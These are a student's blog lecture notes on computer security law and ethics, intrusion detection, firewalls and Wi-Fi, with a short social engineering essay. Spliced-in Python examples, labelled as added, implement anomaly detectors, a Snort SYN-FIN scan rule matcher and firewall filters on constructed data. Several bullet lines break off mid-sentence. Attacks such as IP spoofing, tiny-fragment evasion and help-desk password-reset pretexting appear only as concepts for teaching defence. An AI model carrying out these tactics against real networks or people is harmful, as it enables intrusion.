Lecture 10 is the last lecture.. yippiieee.... last lecture, so we must stay motivated to finish it.. hihihihii... Legal And Ethical Issues In Computer Security is what we learned in this last lecture... Topics covered in this lecture:-
•Legal and Ethical
•Categories of law
•Differences between legal and Ethic
•Ethics concept in Information Security
•Protecting programs and Data
•Information and Law
•This chapter covers information security law and ethics
•The first part of this chapter focuses on relevant legislation and regulation
concerning the management of information in an organization
•The second part of the chapter presents ethical issues for information security as
well as a summary of professional organizations with established ethical codes
•Use this chapter both as a reference to the legal aspects of information security
and as an aid in planning your professional career
Legal & Ethical
~Law
•a rule of conduct or action prescribed or formally recognized as binding or
enforced by a controlling authority
•implies imposition by a sovereign authority and the obligation of obedience on the
part of all subject to that authority
~Ethics
•a set of moral principles or values
•the principles of conduct governing an individual or a group
•an objectively defined standard of right and wrong
Categories Of Law
•Civil law: represents a wide variety of laws that govern a nation or state
•Criminal law: addresses violations harmful to society and is actively enforced
through prosecution by the state
•Tort law enables individuals to seek recourse against others in the event of
personal, physical, or financial injury.
-Torts are enforced via individual lawsuits rather than criminal prosecutions by
the state. When someone brings a legal action under tort law, personal attorneys
present the evidence and argue the details rather than representatives of the
state, who prosecute criminal cases.
•The categories of laws that affect the individual in the workplace are private law
and public law.
-Private law regulates the relationship between the individual and the
organization, and encompasses family law, commercial law, and labor law.
-Public law regulates the structure and administration of government agencies and
their relationships with citizens, employees, and other governments, providing
careful checks and balances. Examples of public law include criminal,
administrative, and constitutional law
Law And Ethics
•Laws are rules that mandate or prohibit certain behavior in society
•Ethics define socially acceptable behaviors
•The key difference between laws and ethics is that laws carry the sanctions of a
governing authority and ethics do not. Ethics in turn are based on cultural mores:
the fixed moral attitudes or customs of a particular group.
•Some ethics are recognized as universal. For example, murder, theft, assault, and
arson are commonly accepted as actions that deviate from ethical and legal codes in
the civilized world.
Differences Between Laws And Ethics
~Laws
•Interpreted by courts
•Established by legislature representing everyone
•Applicable to everyone
•Priority determined by courts if two laws conflict
•Enforceable by police and courts
~Ethics
•Described by unwritten principles
•Interpreted by individuals
•Presented by philosophers, religions, professional groups
•Priority determined by the individual if two principles conflict
Ethics Concept In Information Security
~Ethical Differences Across Cultures
•Cultural differences can make it difficult to determine what is and is not ethical
especially when considering the use of computers.
•individuals of different nationalities have different perspectives; difficulties
arise when one nationality’s ethical behavior conflicts with the ethics of another
•For example, to Western cultures, many of the ways in which Asian cultures use
computer technology constitute software piracy. This ethical conflict arises out of
Asian traditions of collective ownership, which clash with the protection of
~Software License Infringement
•the individuals surveyed understood what software license infringement was but
felt either that their use was not piracy, or that their society permitted this
piracy in some way
•the lack of legal disincentives, the lack of punitive measures, or any one of a
number of other reasons could also explain why these alleged piracy centers were
not oblivious to intellectual property laws
•The individuals studied unilaterally condemned viruses, hacking, and other forms
of system abuse as unacceptable behavior
•The low overall degree of tolerance for illicit system use may be a function of
the easy association between the common crimes of breaking and entering,
trespassing, theft, and destruction of property to their computer-related
~Misuse of Corporate Resources
•Individuals displayed a rather lenient view of personal use of company equipment.
•A range of views within the acknowledgement of ethical versus unethical behavior
as to whether or not some actions are moderately or highly acceptable
~Ethics and Education
•Differences in the ethics of computer use are not exclusively international.
•Differences are found among individuals within the same country, within the same
social class, and within the same company
~Deterrence to Unethical and Illegal Behavior
•It is the responsibility of information security personnel to do everything in
their power to deter these acts and to use policy, education and training, and
technology to protect information and systems
•Three general categories of unethical and illegal behavior:
~Ignorance: ignorance of the law is no excuse; however, ignorance of policy and
procedures is
~Accident: individuals with authorization and privileges to manage information
within the organization are most likely to cause harm or damage by accident
~Intent: intent is often the cornerstone of legal defense, when it becomes necessary
to determine whether or not the offender acted out of ignorance, by accident, or
with specific intent to cause harm or damage
•Deterrence is the best method for preventing an illegal or unethical activity.
Laws, policies, and technical controls are all examples of deterrents. However, it
is generally agreed that laws and policies and their associated penalties only
deter if three conditions are present
~Fear of penalty: The individual intending to commit the act must fear the
penalty. Threats of informal reprimand or verbal warnings may not have the same
impact as the threat of imprisonment or forfeiture of pay.
~Probability of being caught: The individual has to believe there is a strong
possibility of being caught performing the illegal or unethical act. Penalties
can be severe, but the penalty will not deter the behavior unless there is an
expectation of being caught.
~Probability of penalty being administered: The individual must believe that the
penalty will in fact be administered.
Protecting Programs And Data
~Copyright
•designed to protect the expression of ideas
•applies to a creative work such as a story or song.
•intended to allow regular and free exchange of ideas
•must apply to an original work and it must be in some tangible medium of
•intended to cover works in the arts, literature and written scholarship
~Patent
•applies to the result of science, technology and engineering
•can protect a “new and useful process, machine, manufacture or composition of
•designed to protect the device or process for carrying out an idea, not the idea
itself
~Trade secret
•must be kept a secret
•the owner must protect the secret by any means, such as by storing it in a safe,
encrypting it and by making employees sign a statement that they will not
disclose the secret
•trade secret protection can also vanish through reverse engineering
Open-Source Software Affected By Copyright Protection, How?
•Controls the right to copy the software
•Controls the right to distribute the software
•Subject to fair use
•Ease of filing
•Sue if copy sold
•Ownership of copyright
Information And The Law
~Information as an Object
-Information can be sold again and again without depleting stock or diminishing
-Information has the value not the medium
•can be replicated
-Can use the information and sell it many times
•minimal marginal cost
-The cost to produce another one after having produced others is small
•value is timely
-The value of information often depends on when you know it
•often transferred intangibly
-Information is being delivered as bits on a cable
~Legal Issues Related to Information
-Information is the basis of some commerce
~How to ensure that the software developer or publisher receives just
compensation for use of the software?
-Some news and information will be published and distributed on the Internet or
some other public network
~How to ensure that the publisher receives fair compensation for the work?
-By using cryptographic-based technical solutions and supported by a legal
~It is difficult to determine that a set of data came from a particular database,
so that the database owner can claim compensation
-Goods are ordered electronically
-Technical protection available:
~Digital signatures and other cryptographic protocols
-How to prove conditions of delivery
Rights Of Employees And Employers
~ownership of a patent
•The person who owns a work under patent and copyright law is the inventor (producer)
~ownership of a copyright
•Similar to ownership of a patent
•The programmer is the presumed owner of the work
•The owner has all rights to the object
~work for hire
•The employer is considered the author of a work, not the employee
~licensing (an alternative to the ‘work for hire’ arrangement)
•The programmer develops and retains full ownership of the software
•The programmer grants a license to a company to use the program
•License can be:
-For a copy or unlimited copies
-To be used at one location or many
~trade secret protection
•A trade secret is not registered
•The ownership must be established
•The information is treated as confidential data
~employment contract
•Will express the rights of ownership
-The employee is hired to work as a programmer exclusively for the benefit of
-The company states that it is a work for hire situation
-The company claims all rights to any programs developed, including all
copyrights and the right to market
-The employee receives access to certain trade secrets as a part of employment
and the employee agrees not to reveal those secrets
-Sometimes an agreement not to compete is included, such as the employee is not
to compete by working in the same field for a set period of time after
~A computer can be:
•used to attack
•used as a means to commit crime
~Computer crime is hard to prosecute because:
•low computer literacy (lack of understanding)
•no physical clues (lack of physical evidence)
•intangible forms of assets
•considered as juvenile crime
•Lack of political impact
Ethical Issues In Computer Security
Examining A Case For Ethical Issues
1. Understand the situation. Determine the issues involved.
2. Know several theories of ethical reasoning
3. List the ethical principles involved
4. Determine which principles outweigh others.
~Laws are formally adopted rules for acceptable behavior in modern society. Ethics
are socially acceptable behaviors. The key difference between laws and ethics is
that laws carry the sanction of a governing authority and ethics do not.
~Organizations formalize desired behaviors in documents called policies. Policies
must be read and agreed to before they are binding.
~Civil law represents a wide variety of laws that are used to govern a nation or
state. Criminal law addresses violations that harm society and are enforced by
agents of the state or nation. Tort law is conducted by means of individual
lawsuits rather than criminal prosecution by the state.
~Private law focuses on individual relationships, public law addresses regulatory
~Deterrence can prevent an illegal or unethical activity from occurring. Deterrence
requires significant penalties, a high probability of apprehension, and an
expectation of enforcement of penalties.
~As part of an effort to encourage positive ethics, a number of professional
organizations have established codes of conduct or codes of ethics that their
members are expected to follow.
Finally, our network security lectures are done... ermmm.. time to study and prepare for the final exam.. uhukksss.... Good luck all...
A cruel word may wreck a life
A timely word may level stress
A loving word may heal and bless
Have you thought about a social engineering attack? What about the users who use your network on a daily basis? Are you prepared to deal with attacks by these people?
Believe it or not, the weakest link in your security plan is the people who use your network. For the most part, users are not educated on the procedures to identify and neutralize a social engineering attack. What is going to stop a user from finding a CD or DVD in the lunch room, taking it to their workstation and opening the files? This disk could contain a spreadsheet or word processor document with a malicious macro embedded in it. The next thing you know, your network is compromised.
This problem exists particularly in an environment where help desk staff reset passwords over the phone. There is nothing to stop a person intent on breaking into your network from calling the help desk, pretending to be an employee, and asking to have a password reset. Most organizations use a system to generate usernames, so it is not very difficult to figure them out.
Why would an attacker go to your office or make a phone call to the help desk? Simple: it is usually the path of least resistance. There is no need to spend hours trying to break into an electronic system when the physical system is easier to exploit. The next time you see someone walk through the door behind you whom you do not recognize, stop and ask who they are and what they are there for. If you do this, and it happens to be someone who is not supposed to be there, most of the time he will get out as fast as possible. If the person is supposed to be there, then he will most likely be able to produce the name of the person he is there to see.
I know you are saying that I am crazy, right? Well, think of Kevin Mitnick. He is one of the most famous hackers of all time. The US government thought he could whistle tones into a telephone and launch a nuclear attack. Most of his hacking was done through social engineering. Whether he did it through physical visits to offices or by making a phone call, he accomplished some of the greatest hacks to date. If you want to know more about him, Google his name or read the two books he has written.
written by Azma Green
Lecture 9 is not that long at all... ermmm... This class is the chapter on Intrusion Detection Systems.. Hmmm... Topics covered in this lecture:-
•Security Intrusion & Detection
•Types of IDS
•significant issue: hostile/unwanted trespass
~from benign to serious
~unauthorized logon, privilege abuse
~virus, worm, or trojan horse
•classes of intruders:
–masquerader, misfeasor, clandestine user
Examples of Intrusion
•remote root compromise
•web server defacement
•guessing / cracking passwords
•copying viewing sensitive data / databases
•running a packet sniffer
•distributing pirated software
•using an unsecured modem to access net
•impersonating a user to reset password
•using an unattended workstation
Security Intrusion & Detection
~Security intrusion: a security event, or combination of multiple security events, that constitutes a security incident in which an intruder gains, or attempts to gain, access to a system (or system resource) without having authorization to do so.
~Intrusion detection: a security service that monitors and analyzes system events for the purpose of finding, and providing real-time or near real-time warning of, attempts to access system resources in an unauthorized manner.
~motivated by thrill of access and status
•hacking community a strong meritocracy
•status is determined by level of competence
~benign intruders might be tolerable
•do consume resources and may slow performance
•can’t know in advance whether benign or malign
~IDS / IPS / VPNs can help counter
~awareness led to establishment of CERTs
•collect / disseminate vulnerability info / responses
Intrusion Detection Systems
~classify intrusion detection systems (IDSs) as:
•Host-based IDS: monitor single host activity
•Network-based IDS: monitor network traffic
•sensors - collect data
•analyzers - determine if intrusion has
•user interface - manage / direct / view IDS
•assume intruder behavior differs from
~expect overlap as shown
•from past history
•be fault tolerant
•impose a minimal overhead on system
•configured according to system security policies
•adapt to changes in systems and users
•scale to monitor large numbers of systems
•provide graceful degradation of service
•allow dynamic reconfiguration
Types of IDS
•specialized software to monitor system activity to
•detect suspicious behavior
~primary purpose is to detect intrusions, log suspicious events, and send alerts
~can detect both external and internal intrusions
•two approaches, often used in combination:
~anomaly detection - models normal/expected behavior and flags significant deviations from it
~signature detection - defines improper behavior using patterns of known attacks; it cannot catch an attack it has no signature for
•a fundamental tool for intrusion detection
~native audit records - provided by O/S
•always available but may not be optimum
~detection-specific audit records - IDS specific
•additional overhead but specific to IDS task
•often log individual elementary actions
•e.g. may contain fields for: subject, action, object, exception-condition,
~network-based IDS (NIDS)
•monitor traffic at selected points on a network
•in (near) real time to detect intrusion patterns
•may examine network, transport and/or application level protocol activity directed
~comprises a number of sensors
•inline (possibly as part of other net device)
•passive (monitors copy of traffic)
NIDS Sensor Deployment
Distributed Host-Based IDS
Intrusion Detection Techniques
•at application, transport, network layers; unexpected application services, policy
•of denial of service attacks, scanning, worms
~when potential violation detected sensor sends an alert and logs information
•used by analysis module to refine intrusion detection parameters and algorithms
•by security admin to improve protection
• checks excessive event occurrences over time
• alone a crude and ineffective intruder detector
• must determine both thresholds and time intervals
• characterize past behavior of users / groups
• then detect significant deviations
• based on analysis of audit records
*gather metrics: counter, gauge, interval timer, resource utilization
*analyze: mean and standard deviation, multivariate, markov process, time series,
~observe events on system and applying a set
~of rules to decide if intruder
•rule-based anomaly detection
*analyze historical audit records for expected behavior, then match with current
•rule-based penetration identification
*rules identify known penetrations / weaknesses
*often by analyzing attack scripts from Internet
*supplemented with rules from security experts
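Threshold detection and profile-based (statistical) anomaly detection, as an added Python example that is not part of the original lecture or this page. It runs both detectors over a few constructed audit records of the elementary-action form the notes describe (subject, action, object, exception condition); the two subjects, their baseline counts and the limit of 10 failed logins per hour are all assumptions made for the illustration. The point it shows is the one the notes make: a fixed threshold alone is crude, while a per-subject mean and standard deviation separates an ordinary user's spike from an operator whose failure count is routinely high.

```python
import statistics

# Constructed audit records, not from the original page. Each record has the fields the
# notes list for an elementary action: (time_s, subject, action, object, exception_condition).
AUDIT_RECORDS = (
    [(i * 250, "alice", "login", "fileserver", "bad-password") for i in range(12)]  # 12 failures in hour 0
    + [(i * 150, "bob", "login", "fileserver", "bad-password") for i in range(24)]  # 24 failures in hour 0
    + [(900, "alice", "read", "payroll.xls", None)]                                   # an unrelated success
)

# Constructed baselines: failed logins per hour for each subject over the previous eight hours.
HISTORY = {
    "alice": [2, 1, 3, 2, 2, 1, 2, 3],            # ordinary user
    "bob":   [20, 25, 18, 22, 24, 21, 19, 23],    # hypothetical operator whose scripted logins fail often
}


def count_events(records, subject, action, exception, start, window):
    """Counter metric: occurrences of (subject, action, exception) within [start, start + window)."""
    return sum(1 for t, s, a, _o, e in records
               if s == subject and a == action and e == exception and start <= t < start + window)


def threshold_hit(count, limit):
    """Threshold detection: alarm when a fixed limit is exceeded, no matter who the subject is."""
    return count > limit


class Profile:
    """Profile-based anomaly detection: mean and standard deviation of a subject's past counts."""

    def __init__(self, history):
        self.mean = statistics.mean(history)
        self.stdev = statistics.pstdev(history)

    def is_anomalous(self, value, k=3.0):
        """Flag a count that lies more than k standard deviations above this subject's own mean."""
        return value > self.mean + k * self.stdev


def evaluate(records, history, start=0, window=3600, limit=10):
    """Return {subject: (count, threshold_alarm, profile_alarm)} for failed logins in one interval."""
    result = {}
    for subject, past in history.items():
        n = count_events(records, subject, "login", "bad-password", start, window)
        result[subject] = (n, threshold_hit(n, limit), Profile(past).is_anomalous(n))
    return result


if __name__ == "__main__":
    for subject, verdict in evaluate(AUDIT_RECORDS, HISTORY).items():
        print(subject, verdict)
```

evaluate() returns, per subject, the count in the interval and whether each detector fires: for the constructed data alice (12 failures against a baseline near 2) trips both detectors, while bob's 24 failures trip the fixed threshold but sit inside his own profile, which is the false positive the notes warn a bare threshold produces.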
IDS in the market
•real-time packet capture and rule analysis
•passive or inline
~use a simple, flexible rule definition language
~with fixed header and zero or more options
~header includes: action, protocol, source IP, source port, direction, dest IP, dest
~example rule to detect a TCP SYN-FIN scan:
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"SCAN SYN FIN"; flags:SF,12; reference:arachnids,198; classtype:attempted-recon;)
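The rule above is written in Snort's rule language. As an added example (not code from the lecture or from Snort itself), here is a small Python matcher for that language's fixed header plus the msg and flags options: it parses the SYN-FIN rule and evaluates it against constructed packet summaries. $HOME_NET is assumed to be 192.0.2.0/24 and $EXTERNAL_NET its complement; the Packet class and its flag-letter convention are also assumptions made for the example.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed site definition (RFC 5737 documentation range); $EXTERNAL_NET is everything else.
HOME_NET = ipaddress.ip_network("192.0.2.0/24")

# The SYN-FIN rule from the text: fixed header, then options in parentheses.
SYN_FIN_RULE = ('alert tcp $EXTERNAL_NET any -> $HOME_NET any '
                '(msg:"SCAN SYN FIN"; flags:SF,12; reference:arachnids,198; classtype:attempted-recon;)')


@dataclass
class Packet:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    flags: str = ""   # TCP flag letters as Snort spells them: F S R P A U 1 2 (1 and 2 are reserved bits)


HEADER_RE = re.compile(
    r"(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+"
    r"(?P<direction>->|<>)\s+(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<options>.*)\)\s*$", re.S)


def parse_rule(text: str) -> dict:
    """Split a rule into its header fields and a dict of 'name:value' options."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("not a rule: " + text)
    rule = m.groupdict()
    opts = {}
    for item in rule.pop("options").split(";"):
        if item.strip():
            name, _, value = item.partition(":")
            opts[name.strip()] = value.strip().strip('"')
    rule["options"] = opts
    return rule


def _addr_ok(spec: str, addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    if spec == "any":
        return True
    if spec == "$HOME_NET":
        return ip in HOME_NET
    if spec == "$EXTERNAL_NET":
        return ip not in HOME_NET
    return ip in ipaddress.ip_network(spec, strict=False)   # literal address or CIDR


def _port_ok(spec: str, port: int) -> bool:
    return spec == "any" or int(spec) == port


def _flags_ok(spec: str, pkt_flags: str) -> bool:
    """'SF,12' means: exactly S and F are set once the reserved bits 1 and 2 are masked out."""
    required, _, ignored = spec.partition(",")
    return set(pkt_flags) - set(ignored) == set(required)


def _header_ok(rule, src, sport, dst, dport):
    return (_addr_ok(rule["src"], src) and _port_ok(rule["sport"], sport)
            and _addr_ok(rule["dst"], dst) and _port_ok(rule["dport"], dport))


def match(rule: dict, pkt: Packet):
    """Return (action, msg) when the packet satisfies the header and the flags option, else None."""
    if rule["proto"] != pkt.proto:
        return None
    ok = _header_ok(rule, pkt.src, pkt.sport, pkt.dst, pkt.dport)
    if not ok and rule["direction"] == "<>":               # bidirectional rule: try the reverse
        ok = _header_ok(rule, pkt.dst, pkt.dport, pkt.src, pkt.sport)
    if not ok:
        return None
    flags = rule["options"].get("flags")
    if flags is not None and not _flags_ok(flags, pkt.flags):
        return None
    return rule["action"], rule["options"].get("msg")
```

A packet from outside with only SYN and FIN set (with or without the reserved bits) produces the alert; a plain SYN, a SYN-FIN-ACK, an inside-to-outside SYN-FIN or a UDP packet does not, which is exactly what the header fields and the ",12" mask in the flags option express.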
~Honeypots
•are decoy systems
-filled with fabricated info
-instrumented with monitors / event loggers
-divert and hold attacker to collect activity info
-without exposing production systems
•initially were single systems
•more recently are/emulate entire networks
Hmm... our lecture was not that long this time, was it.. ermm... not too boring... ermmm.. great!...
written by Azma Green
Lecture 8: we have studied this thing many times before.. ermm... the Firewall chapter.. Mr. Zaki calls it "dinding berapi" (the Malay term).. when he writes the exam questions we will surely meet "dinding berapi" in the Malay version.. we have studied it before too... what a fiery wall that is... huhuhuhu... Topics in this lecture include...
~Firewall Capabilities & Limits
~Types of firewall
•Packet Filtering Firewall
•Stateful Inspection Firewall
•Application-Level Gateway(Application Proxy)
Introduction to Firewall
~effective means of protecting LANs
~internet connectivity essential
•for organization and individuals
•but creates a threat
~could secure workstations and servers
~also use firewall as perimeter defence
•single choke point to impose security
Firewall Capabilities & Limits
~defines a single choke point that keeps unauthorized users out of the protected
~provides a location for monitoring security events
~convenient platform for some Internet functions such as NAT, usage monitoring,
~cannot protect against attacks bypassing firewall
~may not protect fully against internal threats
~an improperly secured wireless LAN may be accessed from outside the org
~laptop, PDA, portable storage device infected outside then used inside
Types of firewall
Type 1- Packet Filtering Firewall
•applies rules to packets in/out of firewall
•based on information in packet header
~src/dest IP addr & port, IP protocol, interface
•typically a list of rules of matches on fields
~if match rule says if forward or discard packet
•two default policies:
~discard - prohibit unless expressly permitted
•more conservative, controlled, visible to users
~forward - permit unless expressly prohibited
•easier to manage/use but less secure
Packet Filter Rules
A. Inbound mail is allowed (port 25 is for SMTP incoming), but only to a gateway
host. However, packets from a particular external host, SPIGOT, are blocked.
B. This is an explicit statement of the default policy, usually implicitly the last
C. This rule set is intended to specify that any inside host can send mail to the
outside. A TCP packet with a destination port of 25 is routed to the SMTP server
on the destination machine. The problem is that port 25 for SMTP is only a default;
an outside machine could be configured to have some other application linked to port
D. This rule set achieves the intended result that was not achieved in C. This rule
set allows IP packets where the source IP address is one of a list of designated
internal hosts and the destination TCP port number is 25. It also allows incoming
packets with a source port number of 25 that include the ACK flag. This takes
advantage of a feature of TCP connections that once set up, the ACK flag of a TCP
segment is set to acknowledge segments sent from the other side.
E. This rule set is one approach to handling FTP which uses two TCP connections: a
control connection and a data connection for the actual file transfer. The data
connection uses a different dynamically assigned port number for the transfer.
Most servers, and hence most attack targets, live on low-numbered ports; most
outgoing calls tend to use a higher-numbered port, typically above 1023. Rule
set E points out the difficulty in dealing with applications at the packet
Packet Filter Weaknesses
~cannot prevent attack on application bugs
~limited logging functionality
~do not support advanced user authentication
~vulnerable to attacks on TCP/IP protocol bugs (network address spoofing)
~improper configuration can lead to breaches
Packet Filter Attacks
~IP address spoofing: The intruder transmits packets from the outside with a source
IP address field containing an address of an internal(assumed trusted) host. The
countermeasure is to discard external packets with an inside source address
~source route attacks: specifies the route that a packet should take as it crosses
the Internet. The countermeasure is to discard all packets that use this option.
~tiny fragment attacks: intruder uses the IP fragmentation option to create
extremely small fragments and force the TCP header information into a separate
packet fragment, filter rules that specify patterns for those fields of header will
not match. It can be defeated by requiring that the first fragment contain most of
the transport header.
Type 2 - Stateful Inspection Firewall
~reviews packet header information but also keeps info on TCP connections
•applications use TCP and create sessions and typically have a low, “well-known” port
number (<1024) for connecting to a server
•and a high, dynamically assigned port number (1024-65535) for the hosts that make the
•a simple packet filter must allow all return packets to high-numbered ports back in
•a stateful inspection packet firewall tightens rules for TCP traffic using a
directory of TCP connections
•only allow incoming traffic to high-numbered ports for packets matching an entry
in this directory
•may also track TCP sequence numbers as well
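The difference between a stateless rule set like D and a stateful inspection firewall, as an added Python example that is not from the lecture: both filters see the same constructed traffic (an outbound mail connection, its genuine reply, a forged "reply" from source port 25 with the ACK flag set aimed at an unrelated inside port, and an external packet spoofing an inside source address). The inside network 192.0.2.0/24, the hosts and the packet representation are assumptions made for the example; the anti-spoofing check is the countermeasure from the "Packet Filter Attacks" list above.

```python
import ipaddress
from dataclasses import dataclass, field

# Constructed addresses (RFC 5737 documentation ranges), not from the original page.
INSIDE_NET = ipaddress.ip_network("192.0.2.0/24")


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset = field(default_factory=frozenset)   # e.g. {"SYN"}, {"ACK"}


def is_inside(ip: str) -> bool:
    return ipaddress.ip_address(ip) in INSIDE_NET


def spoofed(pkt: Packet, interface: str) -> bool:
    """IP address spoofing countermeasure: a packet arriving on the external interface
    must not carry an inside source address."""
    return interface == "external" and is_inside(pkt.src)


# Rule set D as ordered (action, predicate) pairs; the first matching rule decides.
RULESET_D = [
    ("forward", lambda p: is_inside(p.src) and p.dport == 25),                           # inside host -> any SMTP server
    ("forward", lambda p: not is_inside(p.src) and p.sport == 25 and "ACK" in p.flags),  # reply from an SMTP server
]


def static_filter(pkt: Packet, interface: str, rules=RULESET_D) -> str:
    """Stateless packet filter with the 'discard unless expressly permitted' default policy."""
    if spoofed(pkt, interface):
        return "discard"
    for action, test in rules:
        if test(pkt):
            return action
    return "discard"


class StatefulFilter:
    """Stateful inspection: records outbound TCP connections in a directory and admits a packet
    to a high-numbered inside port only when it matches an entry made by an earlier outbound packet."""

    def __init__(self):
        self.directory = set()   # (inside_ip, inside_port, outside_ip, outside_port)

    def process(self, pkt: Packet, interface: str) -> str:
        if spoofed(pkt, interface):
            return "discard"
        if interface == "internal" and is_inside(pkt.src) and pkt.dport == 25:
            self.directory.add((pkt.src, pkt.sport, pkt.dst, pkt.dport))
            return "forward"
        if interface == "external" and (pkt.dst, pkt.dport, pkt.src, pkt.sport) in self.directory:
            return "forward"
        return "discard"


def compare(packets):
    """Run the same packets through both filters; returns [(static_decision, stateful_decision), ...]."""
    stateful = StatefulFilter()
    return [(static_filter(p, iface), stateful.process(p, iface)) for p, iface in packets]


# Constructed traffic: an outbound mail connection, its reply, a forged "reply" aimed at an
# unrelated inside port, and an external packet spoofing an inside source address.
SAMPLE = [
    (Packet("192.0.2.10", 45000, "203.0.113.7", 25, frozenset({"SYN"})), "internal"),
    (Packet("203.0.113.7", 25, "192.0.2.10", 45000, frozenset({"SYN", "ACK"})), "external"),
    (Packet("203.0.113.7", 25, "192.0.2.40", 8080, frozenset({"ACK"})), "external"),
    (Packet("192.0.2.10", 45000, "192.0.2.20", 25, frozenset({"SYN"})), "external"),
]
```

compare(SAMPLE) shows the weakness the notes point at: the stateless rule set forwards the forged ACK packet because it only sees the source port and the flag, while the stateful filter discards it because no inside host opened a connection matching it. Both discard the spoofed packet before any rule is consulted.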
Type 3 - Application-Level Gateway(Application Proxy)
~acts as a relay of application-level traffic
•user contacts gateway with remote host name
•authenticates the users (valid user id & password)
•gateway contacts application on remote host and relays TCP segments between server
~must have proxy code for each application
•is installed on the gateway for each desired application
•may configure to restrict application features supported
•frequent software updating to ensure that they are running latest versions of the
~more secure than packet filters
~but have higher overheads
Type 4 - Circuit-Level Gateway
•a circuit-level gateway does not permit an end to end TCP connection
•sets up two TCP connections, between itself to an inside user and between itself
to an outside host
•The security function consists of determining which connections will be allowed.
•relays TCP segments from one connection to the other without examining contents
~hence independent of application logic
~just determines whether relay is permitted
•typically used when inside users trusted
~may use application-level gateway inbound and circuit-level gateway outbound
~hence lower overheads
~Bastion Host
•critical strongpoint in the network’s security
•hosts application-level/circuit-level gateways
~runs secure O/S, only essential services
~may require user auth to access proxy or host
~each proxy can restrict features, hosts accessed
~each proxy small, simple, checked for security
~each proxy is independent, non-privileged
~limited disk use, hence read-only code
~Host-Based Firewalls
•used to secure an individual host
•available in/add-on for many O/S
•filter packet flows
•often used on servers
~tailored filter rules for specific host needs
~protection from both internal / external attacks
~additional layer of protection to org firewall
~Personal Firewall
~controls traffic flow to/from PC/workstation
~for both home or corporate use
~may be software module on PC
~or in home cable/DSL router/gateway
~typically much less complex
~primary role to deny unauthorized access
~may also monitor outgoing traffic to detect/block worm/malware activity
• An external firewall is placed at the edge of a local or enterprise network.
• One or more internal firewalls protect the bulk of the enterprise network.
• Between these two types of firewalls are one or more networked devices in a region
referred to as a DMZ (demilitarized zone) network. Systems that are externally
accessible but need some protections are usually located on DMZ networks.
Virtual Private Networks (VPNs)
• In essence, a VPN consists of a set of computers that interconnect by means of a
relatively unsecure network.
• Use of a public network exposes corporate traffic to eavesdropping and provides an
entry point for unauthorized users. To counter this problem, a VPN is needed.
• In essence, a VPN uses encryption and authentication in the lower protocol layers
to provide a secure connection through an otherwise insecure network, typically
• VPNs are generally cheaper than real private networks using private lines but rely
on having the same encryption and authentication system at both ends.
• The encryption may be performed by firewall software or possibly by routers.
• The most common protocol mechanism used for this purpose is at the IP level and is
known as IPSec.
• A distributed firewall configuration involves standalone firewall devices plus
host-based firewalls, personal firewall working together under a central
• Administrators can configure host-resident firewalls on hundreds of servers and
workstation as well as configuring personal firewalls on local and remote user
systems. Tools let the network administrator set policies and monitor security
across the entire network.
Yuhuuu.. that is all we learned about firewalls.. for more details, surf the net.. there must be lots more info.. yihiiii...
written by Azma Green
In this lecture sir taught us Wireless Security.. ermmmm... this lecture was pretty good too.. not boring.. ermm...
•IEEE ratified 802.11 in 1997.
~Also known as Wi-Fi.
•Wireless LAN at 1 Mbps & 2 Mbps.
•WECA (Wireless Ethernet Compatibility Alliance) promoted Interoperability.
~Now Wi-Fi Alliance
•802.11 focuses on Layer 1 & Layer 2 of the OSI model.
~Physical layer
~Data link layer
~Two pieces of equipment defined:
*Station: a desktop or laptop PC or PDA with a wireless NIC.
*Access Point: a bridge between wireless and wired networks
~Wired network interface (usually 802.3)
*Aggregates access for multiple wireless stations to the wired network.
~Infrastructure mode
•Basic Service Set (BSS)
*One access point
•Extended Service Set (ESS)
*Two or more BSSs forming a single subnet.
•Most corporate LANs in this mode.
~Ad hoc mode
•Also called peer-to-peer.
•Independent Basic Service Set (IBSS)
•Set of 802.11 wireless stations that communicate directly without an access point.
*Useful for quick & easy wireless networks.
802.11 Physical Layer
~Originally three alternative physical layers
•Two incompatible spread-spectrum radio in 2.4Ghz ISM band
*Frequency Hopping Spread Spectrum (FHSS)
*Direct Sequence Spread Spectrum (DSSS)
~14 channels (11 channels in US)
•One diffuse infrared layer
*1 Mbps or 2 Mbps.
802.11 Data Link Layer
~Layer 2 split into:
•Logical Link Control (LLC).
•Media Access Control (MAC).
~LLC - same 48-bit addresses as 802.3.
~MAC - CSMA/CD not possible.
•Can’t listen for collision while transmitting.
~CSMA/CA – Collision Avoidance.
•Sender waits for clear air, waits random time, then sends data.
•Receiver sends explicit ACK when data arrives intact.
•Also handles interference.
•But adds overhead.
~802.11 always slower than equivalent 802.3
RTS / CTS
~To handle hidden nodes
~Sending station sends
•“Request to Send”
~Access point responds with
•“Clear to Send”
•All other stations hear this and delay any transmissions.
~Only used for larger pieces of data.
•When retransmission may waste significant time.
•802.11b ratified in 1999 adding 5.5 Mbps and 11 Mbps.
•DSSS as physical layer.
~11 channels (3 non-overlapping)
•Dynamic rate shifting.
~Transparent to higher layers
~Ideally 11 Mbps.
~Shifts down through 5.5 Mbps, 2 Mbps to 1 Mbps.
~Shifts back up when possible.
•Maximum specified range 100 meters
•Average throughput of 4Mbps
Joining a BSS
•When 802.11 client enters range of one or more APs
~APs send beacons.
~AP beacon can include SSID.
~AP chosen on signal strength and observed error rates.
~After AP accepts client.
*Client tunes to AP channel.
•Periodically, all channels surveyed.
~To check for stronger or more reliable APs.
~If found, re-associates with new AP.
Roaming and Channels
~Re-association with APs
•Moving out of range.
•High error rates.
•High network traffic.
*Allows load balancing.
~Each AP has a channel.
•14 partially overlapping channels.
•Only three channels that have no overlap.
*Best for multi cell coverage.
~802.11a ratified in 1999 (products shipped from 2001)
~Supports up to 54Mbps in the 5 GHz range.
•Higher frequency limits the range
•Regulated frequency reduces interference from other devices
~12 non-overlapping channels
~Usable range of 30 metres
~Average throughput of 30 Mbps
~Not backwards compatible with 802.11b
~802.11g ratified in 2003
~Supports up to 54Mbps in the 2.4GHz range.
•Backwards compatible with 802.11b
~3 non-overlapping channels
~Range similar to 802.11b
~Average throughput of 30 Mbps
